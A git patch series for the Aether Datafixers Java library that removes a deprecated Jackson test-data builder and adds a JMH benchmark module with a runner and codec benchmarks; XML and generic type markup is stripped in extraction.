-@Deprecated(since = "0.4.0", forRemoval = true)
-package de.splatgames.aether.datafixers.codec.jackson;
diff --git a/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java b/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java
index f67c78b..e5acf4c 100644
--- a/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java
+++ b/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java
@@ -139,21 +139,6 @@ public static TestDataBuilder gson() {
return new TestDataBuilder<>(GsonOps.INSTANCE);
}
- /**
- * Creates a builder using {@link JacksonJsonOps}.
- *
- *
Use this when testing with Jackson's JSON representation.
- *
- * @return a new {@link TestDataBuilder} for Jackson JSON
- * @deprecated Since 0.5.0. Use {@link #jacksonJson()} instead for explicit format naming.
- * This method will be removed in version 1.0.0.
- */
- @Deprecated(forRemoval = true, since = "0.5.0")
- @NotNull
- public static TestDataBuilder jackson() {
- return jacksonJson();
- }
-
/**
* Creates a builder using {@link JacksonJsonOps}.
*
From 501923e6887f5533f7650db4b533c612164db227 Mon Sep 17 00:00:00 2001
From: Erik
Date: Sun, 18 Jan 2026 12:48:25 +0100
Subject: [PATCH 03/39] Remove deprecated `TestData.jackson()` in favor of
 `TestData.jacksonJson()` and update references accordingly.
---
aether-datafixers-testkit/pom.xml | 2 +-
.../aether/datafixers/testkit/TestDataTest.java | 11 -----------
docs/appendix/glossary.md | 2 +-
docs/testkit/test-data-builders.md | 2 --
4 files changed, 2 insertions(+), 15 deletions(-)
diff --git a/aether-datafixers-testkit/pom.xml b/aether-datafixers-testkit/pom.xml
index 08c93df..dde9eb2 100644
--- a/aether-datafixers-testkit/pom.xml
+++ b/aether-datafixers-testkit/pom.xml
@@ -54,7 +54,7 @@
gson
-
+
com.fasterxml.jackson.corejackson-databind
diff --git a/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java b/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java
index 7f03785..04dd795 100644
--- a/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java
+++ b/aether-datafixers-testkit/src/test/java/de/splatgames/aether/datafixers/testkit/TestDataTest.java
@@ -264,17 +264,6 @@ void jacksonJsonCreatesJacksonJsonBuilder() {
assertThat(dynamic.ops()).isSameAs(JacksonJsonOps.INSTANCE);
}
- @Test
- @DisplayName("jackson() creates Jackson JSON builder (deprecated)")
- @SuppressWarnings("deprecation")
- void jacksonCreatesJacksonJsonBuilder() {
- final Dynamic dynamic = TestData.jackson().object()
- .put("key", "value")
- .build();
-
- assertThat(dynamic.get("key").asString().result()).hasValue("value");
- }
-
@Test
@DisplayName("snakeYaml() creates SnakeYAML builder")
void snakeYamlCreatesSnakeYamlBuilder() {
diff --git a/docs/appendix/glossary.md b/docs/appendix/glossary.md
index 5bb793f..2f2af82 100644
--- a/docs/appendix/glossary.md
+++ b/docs/appendix/glossary.md
@@ -140,7 +140,7 @@ Terminology used in Aether Datafixers.
: Test harness for validating Schema configurations.
**TestData**
-: Entry point for fluent test data builders (TestData.gson(), TestData.jackson()).
+: Entry point for fluent test data builders (TestData.gson(), TestData.jacksonJson()).
**TestDataBuilder**
: Fluent builder for creating Dynamic objects with fields.
diff --git a/docs/testkit/test-data-builders.md b/docs/testkit/test-data-builders.md
index 157dba9..283e849 100644
--- a/docs/testkit/test-data-builders.md
+++ b/docs/testkit/test-data-builders.md
@@ -31,8 +31,6 @@ TestData.jacksonXml()...
TestData.using(myCustomOps)...
```
-> **Deprecation Notice:** `TestData.jackson()` is deprecated since 0.5.0 and will be removed in 1.0.0. Use `TestData.jacksonJson()` instead for explicit format naming.
-
## Creating Primitives
```java
From 36260ce3940e55425c39dbe9c55141f9ddf1a310 Mon Sep 17 00:00:00 2001
From: Erik
Date: Tue, 20 Jan 2026 20:00:30 +0100
Subject: [PATCH 04/39] Update `.gitignore` to exclude `current-ticket.md`
---
.gitignore | 3 +++
1 file changed, 3 insertions(+)
diff --git a/.gitignore b/.gitignore
index 5232b33..dcc6e4a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -50,3 +50,6 @@ bin/
# Claude Code
/.claude/
/CLAUDE.md
+
+# GitHub
+current-ticket.md
\ No newline at end of file
From 1d1d203231fb580ad8a94113c0503cc0c8756fe8 Mon Sep 17 00:00:00 2001
From: Erik
Date: Tue, 20 Jan 2026 20:45:56 +0100
Subject: [PATCH 05/39] Add benchmarking utilities and JMH tests for Aether
Datafixers
- Introduce `BenchmarkBootstrap` to provide pre-configured `DataFixer` instances.
- Add `BenchmarkDataGenerator` for creating diverse test data payloads.
- Implement `BenchmarkRunner` as a main entry point for executing JMH benchmarks.
- Include `CollectionCodecBenchmark` for measuring encoding/decoding performance of collections.
- Add `ConcurrentMigrationBenchmark` to analyze multithreaded data migration performance.
---
aether-datafixers-benchmarks/pom.xml | 174 ++++++++++++++
.../benchmarks/BenchmarkRunner.java | 185 +++++++++++++++
.../codec/CollectionCodecBenchmark.java | 180 ++++++++++++++
.../codec/PrimitiveCodecBenchmark.java | 190 +++++++++++++++
.../ConcurrentMigrationBenchmark.java | 219 ++++++++++++++++++
.../core/MultiFixChainBenchmark.java | 149 ++++++++++++
.../core/SchemaLookupBenchmark.java | 148 ++++++++++++
.../benchmarks/core/SingleFixBenchmark.java | 132 +++++++++++
.../format/CrossFormatBenchmark.java | 187 +++++++++++++++
.../benchmarks/format/JsonBenchmark.java | 195 ++++++++++++++++
.../benchmarks/format/TomlXmlBenchmark.java | 192 +++++++++++++++
.../benchmarks/format/YamlBenchmark.java | 192 +++++++++++++++
.../benchmarks/util/BenchmarkBootstrap.java | 214 +++++++++++++++++
.../util/BenchmarkDataGenerator.java | 184 +++++++++++++++
.../benchmarks/util/PayloadSize.java | 94 ++++++++
pom.xml | 16 ++
16 files changed, 2651 insertions(+)
create mode 100644 aether-datafixers-benchmarks/pom.xml
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
diff --git a/aether-datafixers-benchmarks/pom.xml b/aether-datafixers-benchmarks/pom.xml
new file mode 100644
index 0000000..ef8e7ba
--- /dev/null
+++ b/aether-datafixers-benchmarks/pom.xml
@@ -0,0 +1,174 @@
+
+
+ 4.0.0
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers
+ 1.0.0-SNAPSHOT
+
+
+ aether-datafixers-benchmarks
+ jar
+
+ Aether Datafixers :: Benchmarks
+ JMH microbenchmarks for Aether Datafixers performance analysis.
+
+
+
+ true
+ true
+
+ true
+
+ de.splatgames.aether.datafixers.benchmarks.BenchmarkRunner
+
+
+
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers-api
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers-core
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers-codec
+
+
+ de.splatgames.aether.datafixers
+ aether-datafixers-testkit
+
+
+
+
+ org.openjdk.jmh
+ jmh-core
+
+
+ org.openjdk.jmh
+ jmh-generator-annprocess
+ provided
+
+
+
+
+ com.google.code.gson
+ gson
+
+
+ com.fasterxml.jackson.core
+ jackson-databind
+
+
+
+
+ org.yaml
+ snakeyaml
+
+
+ com.fasterxml.jackson.dataformat
+ jackson-dataformat-yaml
+
+
+
+
+ com.fasterxml.jackson.dataformat
+ jackson-dataformat-toml
+
+
+
+
+ com.fasterxml.jackson.dataformat
+ jackson-dataformat-xml
+
+
+
+
+ com.google.guava
+ guava
+
+
+
+
+ org.jetbrains
+ annotations
+
+
+
+
+
+
+
+ org.apache.maven.plugins
+ maven-compiler-plugin
+
+
+
+ org.openjdk.jmh
+ jmh-generator-annprocess
+ ${jmh.version}
+
+
+
+
+
+ org.apache.maven.plugins
+ maven-enforcer-plugin
+
+
+
+
+ org.apache.maven.plugins
+ maven-shade-plugin
+ ${plugin.shade.version}
+
+
+ package
+
+ shade
+
+
+
+
+ org.openjdk.jmh.Main
+
+
+
+
+
+
+ *:*
+
+ META-INF/*.SF
+ META-INF/*.DSA
+ META-INF/*.RSA
+ META-INF/MANIFEST.MF
+
+
+
+ false
+ true
+ benchmarks
+
+
+
+
+
+
+
+ org.codehaus.mojo
+ exec-maven-plugin
+ 3.1.0
+
+ ${main.class}
+
+
+
+
+
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
new file mode 100644
index 0000000..4467845
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
@@ -0,0 +1,185 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks;
+
+import org.openjdk.jmh.runner.Runner;
+import org.openjdk.jmh.runner.RunnerException;
+import org.openjdk.jmh.runner.options.Options;
+import org.openjdk.jmh.runner.options.OptionsBuilder;
+
+import java.io.IOException;
+
+/**
+ * Main entry point for running Aether Datafixers JMH benchmarks.
+ *
+ *
This class provides a convenient way to run benchmarks programmatically
+ * with default settings optimized for comprehensive performance analysis.
+ *
+ *
Usage
+ *
+ *
Via exec:java (Quick Development Runs)
+ *
{@code
+ * # Run all benchmarks with default settings
+ * mvn exec:java -pl aether-datafixers-benchmarks
+ *
+ * # Run with JMH arguments
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="-h"
+ * }
+ *
+ *
Via Fat JAR (Production Runs)
+ *
{@code
+ * # Build the fat JAR
+ * mvn clean package -pl aether-datafixers-benchmarks -DskipTests
+ *
+ * # Run all benchmarks
+ * java -jar aether-datafixers-benchmarks/target/aether-datafixers-benchmarks-*-benchmarks.jar
+ *
+ * # Run specific benchmark
+ * java -jar target/*-benchmarks.jar SingleFixBenchmark
+ *
+ * # Run with custom parameters
+ * java -jar target/*-benchmarks.jar -p payloadSize=LARGE -wi 3 -i 5 -f 1
+ *
+ * # Output JSON results
+ * java -jar target/*-benchmarks.jar -rf json -rff results.json
+ *
+ * # List all available benchmarks
+ * java -jar target/*-benchmarks.jar -l
+ * }
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+public final class BenchmarkRunner {
+
+ private BenchmarkRunner() {
+ // Main class
+ }
+
+ /**
+ * Main entry point for running benchmarks.
+ *
+ *
When run without arguments, executes all benchmarks in the package.
+ * Supports all standard JMH command-line arguments.
+ *
+ * @param args command-line arguments (passed to JMH)
+ * @throws RunnerException if benchmark execution fails
+ * @throws IOException if there is an I/O error
+ */
+ public static void main(final String[] args) throws RunnerException, IOException {
+ if (args.length > 0) {
+ // If arguments are provided, delegate to JMH main
+ org.openjdk.jmh.Main.main(args);
+ } else {
+ // Run with default options
+ runAllBenchmarks();
+ }
+ }
+
+ /**
+ * Runs all benchmarks with default configuration.
+ *
+ * @throws RunnerException if benchmark execution fails
+ */
+ public static void runAllBenchmarks() throws RunnerException {
+ final Options options = new OptionsBuilder()
+ .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\..*")
+ .warmupIterations(5)
+ .measurementIterations(10)
+ .forks(2)
+ .jvmArgs("-Xms2G", "-Xmx2G")
+ .build();
+
+ new Runner(options).run();
+ }
+
+ /**
+ * Runs a quick subset of benchmarks for validation.
+ *
+ *
Useful for CI/CD pipelines or quick sanity checks.
+ *
+ * @throws RunnerException if benchmark execution fails
+ */
+ public static void runQuickBenchmarks() throws RunnerException {
+ final Options options = new OptionsBuilder()
+ .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.core\\.SingleFixBenchmark")
+ .warmupIterations(2)
+ .measurementIterations(3)
+ .forks(1)
+ .jvmArgs("-Xms1G", "-Xmx1G")
+ .param("payloadSize", "SMALL")
+ .build();
+
+ new Runner(options).run();
+ }
+
+ /**
+ * Runs core migration benchmarks only.
+ *
+ * @throws RunnerException if benchmark execution fails
+ */
+ public static void runCoreBenchmarks() throws RunnerException {
+ final Options options = new OptionsBuilder()
+ .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.core\\..*")
+ .warmupIterations(5)
+ .measurementIterations(10)
+ .forks(2)
+ .jvmArgs("-Xms2G", "-Xmx2G")
+ .build();
+
+ new Runner(options).run();
+ }
+
+ /**
+ * Runs format comparison benchmarks only.
+ *
+ * @throws RunnerException if benchmark execution fails
+ */
+ public static void runFormatBenchmarks() throws RunnerException {
+ final Options options = new OptionsBuilder()
+ .include("de\\.splatgames\\.aether\\.datafixers\\.benchmarks\\.format\\..*")
+ .warmupIterations(5)
+ .measurementIterations(10)
+ .forks(2)
+ .jvmArgs("-Xms2G", "-Xmx2G")
+ .build();
+
+ new Runner(options).run();
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
new file mode 100644
index 0000000..2167a2d
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -0,0 +1,180 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.codec;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.codec.Codec;
+import de.splatgames.aether.datafixers.api.codec.Codecs;
+import de.splatgames.aether.datafixers.api.result.DataResult;
+import de.splatgames.aether.datafixers.api.util.Pair;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Param;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for collection codec encode/decode performance.
+ *
+ *
Measures the performance of encoding and decoding lists of various sizes
+ * using the {@link Codecs#list(Codec)} API.
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
+@OutputTimeUnit(TimeUnit.MICROSECONDS)
+@State(Scope.Benchmark)
+@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
+@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
+@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
+public class CollectionCodecBenchmark {
+
+ @Param({"10", "100", "1000"})
+ private int listSize;
+
+ private Codec> stringListCodec;
+ private Codec> intListCodec;
+
+ private List stringList;
+ private List intList;
+
+ private JsonElement encodedStringList;
+ private JsonElement encodedIntList;
+
+ @Setup(Level.Trial)
+ public void setup() {
+ this.stringListCodec = Codecs.list(Codecs.STRING);
+ this.intListCodec = Codecs.list(Codecs.INT);
+
+ // Generate test data
+ this.stringList = new ArrayList<>(this.listSize);
+ this.intList = new ArrayList<>(this.listSize);
+
+ for (int i = 0; i < this.listSize; i++) {
+ this.stringList.add("item-" + i);
+ this.intList.add(i);
+ }
+
+ // Pre-encode for decode benchmarks
+ this.encodedStringList = this.stringListCodec.encodeStart(GsonOps.INSTANCE, this.stringList)
+ .result().orElseThrow();
+ this.encodedIntList = this.intListCodec.encodeStart(GsonOps.INSTANCE, this.intList)
+ .result().orElseThrow();
+ }
+
+ // ==================== String List ====================
+
+ /**
+ * Benchmarks encoding a list of strings.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void encodeStringList(final Blackhole blackhole) {
+ final DataResult result = this.stringListCodec.encodeStart(
+ GsonOps.INSTANCE, this.stringList);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks decoding a list of strings.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void decodeStringList(final Blackhole blackhole) {
+ final DataResult, JsonElement>> result = this.stringListCodec.decode(
+ GsonOps.INSTANCE, this.encodedStringList);
+ blackhole.consume(result);
+ }
+
+ // ==================== Integer List ====================
+
+ /**
+ * Benchmarks encoding a list of integers.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void encodeIntList(final Blackhole blackhole) {
+ final DataResult result = this.intListCodec.encodeStart(
+ GsonOps.INSTANCE, this.intList);
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks decoding a list of integers.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void decodeIntList(final Blackhole blackhole) {
+ final DataResult, JsonElement>> result = this.intListCodec.decode(
+ GsonOps.INSTANCE, this.encodedIntList);
+ blackhole.consume(result);
+ }
+
+ // ==================== Round Trip ====================
+
+ /**
+ * Benchmarks round-trip encoding and decoding of a string list.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void roundTripStringList(final Blackhole blackhole) {
+ final DataResult encoded = this.stringListCodec.encodeStart(
+ GsonOps.INSTANCE, this.stringList);
+ final DataResult, JsonElement>> decoded = encoded.flatMap(
+ json -> this.stringListCodec.decode(GsonOps.INSTANCE, json));
+ blackhole.consume(decoded);
+ }
+
+ /**
+ * Benchmarks round-trip encoding and decoding of an integer list.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void roundTripIntList(final Blackhole blackhole) {
+ final DataResult encoded = this.intListCodec.encodeStart(
+ GsonOps.INSTANCE, this.intList);
+ final DataResult, JsonElement>> decoded = encoded.flatMap(
+ json -> this.intListCodec.decode(GsonOps.INSTANCE, json));
+ blackhole.consume(decoded);
+ }
+}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
new file mode 100644
index 0000000..82b3d04
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -0,0 +1,190 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+package de.splatgames.aether.datafixers.benchmarks.codec;
+
+import com.google.gson.JsonElement;
+import de.splatgames.aether.datafixers.api.codec.Codec;
+import de.splatgames.aether.datafixers.api.codec.Codecs;
+import de.splatgames.aether.datafixers.api.result.DataResult;
+import de.splatgames.aether.datafixers.api.util.Pair;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+import org.openjdk.jmh.annotations.Benchmark;
+import org.openjdk.jmh.annotations.BenchmarkMode;
+import org.openjdk.jmh.annotations.Fork;
+import org.openjdk.jmh.annotations.Level;
+import org.openjdk.jmh.annotations.Measurement;
+import org.openjdk.jmh.annotations.Mode;
+import org.openjdk.jmh.annotations.OutputTimeUnit;
+import org.openjdk.jmh.annotations.Scope;
+import org.openjdk.jmh.annotations.Setup;
+import org.openjdk.jmh.annotations.State;
+import org.openjdk.jmh.annotations.Warmup;
+import org.openjdk.jmh.infra.Blackhole;
+
+import java.util.concurrent.TimeUnit;
+
+/**
+ * JMH benchmark for primitive codec encode/decode performance.
+ *
+ *
Measures the performance of encoding and decoding primitive types
+ * using the {@link Codecs} API.
+ *
+ * @author Erik Pförtner
+ * @since 1.0.0
+ */
+@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
+@OutputTimeUnit(TimeUnit.NANOSECONDS)
+@State(Scope.Benchmark)
+@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
+@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
+@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
+public class PrimitiveCodecBenchmark {
+
+ // Test values
+ private static final boolean TEST_BOOL = true;
+ private static final int TEST_INT = 42;
+ private static final long TEST_LONG = 123456789L;
+ private static final float TEST_FLOAT = 3.14159f;
+ private static final double TEST_DOUBLE = 2.718281828;
+ private static final String TEST_STRING = "benchmark-test-string";
+
+ // Pre-encoded values for decode benchmarks
+ private JsonElement encodedBool;
+ private JsonElement encodedInt;
+ private JsonElement encodedLong;
+ private JsonElement encodedFloat;
+ private JsonElement encodedDouble;
+ private JsonElement encodedString;
+
+ @Setup(Level.Trial)
+ public void setup() {
+ this.encodedBool = Codecs.BOOL.encodeStart(GsonOps.INSTANCE, TEST_BOOL).result().orElseThrow();
+ this.encodedInt = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT).result().orElseThrow();
+ this.encodedLong = Codecs.LONG.encodeStart(GsonOps.INSTANCE, TEST_LONG).result().orElseThrow();
+ this.encodedFloat = Codecs.FLOAT.encodeStart(GsonOps.INSTANCE, TEST_FLOAT).result().orElseThrow();
+ this.encodedDouble = Codecs.DOUBLE.encodeStart(GsonOps.INSTANCE, TEST_DOUBLE).result().orElseThrow();
+ this.encodedString = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING).result().orElseThrow();
+ }
+
+ // ==================== Boolean ====================
+
+ @Benchmark
+ public void encodeBool(final Blackhole blackhole) {
+ final DataResult result = Codecs.BOOL.encodeStart(GsonOps.INSTANCE, TEST_BOOL);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeBool(final Blackhole blackhole) {
+ final DataResult> result = Codecs.BOOL.decode(GsonOps.INSTANCE, this.encodedBool);
+ blackhole.consume(result);
+ }
+
+ // ==================== Integer ====================
+
+ @Benchmark
+ public void encodeInt(final Blackhole blackhole) {
+ final DataResult result = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeInt(final Blackhole blackhole) {
+ final DataResult> result = Codecs.INT.decode(GsonOps.INSTANCE, this.encodedInt);
+ blackhole.consume(result);
+ }
+
+ // ==================== Long ====================
+
+ @Benchmark
+ public void encodeLong(final Blackhole blackhole) {
+ final DataResult result = Codecs.LONG.encodeStart(GsonOps.INSTANCE, TEST_LONG);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeLong(final Blackhole blackhole) {
+ final DataResult> result = Codecs.LONG.decode(GsonOps.INSTANCE, this.encodedLong);
+ blackhole.consume(result);
+ }
+
+ // ==================== Float ====================
+
+ @Benchmark
+ public void encodeFloat(final Blackhole blackhole) {
+ final DataResult result = Codecs.FLOAT.encodeStart(GsonOps.INSTANCE, TEST_FLOAT);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeFloat(final Blackhole blackhole) {
+ final DataResult> result = Codecs.FLOAT.decode(GsonOps.INSTANCE, this.encodedFloat);
+ blackhole.consume(result);
+ }
+
+ // ==================== Double ====================
+
+ @Benchmark
+ public void encodeDouble(final Blackhole blackhole) {
+ final DataResult result = Codecs.DOUBLE.encodeStart(GsonOps.INSTANCE, TEST_DOUBLE);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeDouble(final Blackhole blackhole) {
+ final DataResult> result = Codecs.DOUBLE.decode(GsonOps.INSTANCE, this.encodedDouble);
+ blackhole.consume(result);
+ }
+
+ // ==================== String ====================
+
+ @Benchmark
+ public void encodeString(final Blackhole blackhole) {
+ final DataResult result = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING);
+ blackhole.consume(result);
+ }
+
+ @Benchmark
+ public void decodeString(final Blackhole blackhole) {
+ final DataResult> result = Codecs.STRING.decode(GsonOps.INSTANCE, this.encodedString);
+ blackhole.consume(result);
+ }
+
+ // ==================== Round Trip ====================
+
+ @Benchmark
+ public void roundTripInt(final Blackhole blackhole) {
+ final DataResult encoded = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT);
+ final DataResult> decoded = encoded.flatMap(
+ json -> Codecs.INT.decode(GsonOps.INSTANCE, json));
+ blackhole.consume(decoded);
+ }
+
+ @Benchmark
+ public void roundTripString(final Blackhole blackhole) {
+ final DataResult encoded = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING);
+ final DataResult> decoded = encoded.flatMap(
+ json -> Codecs.STRING.decode(GsonOps.INSTANCE, json));
+ blackhole.consume(decoded);
+ }
+}
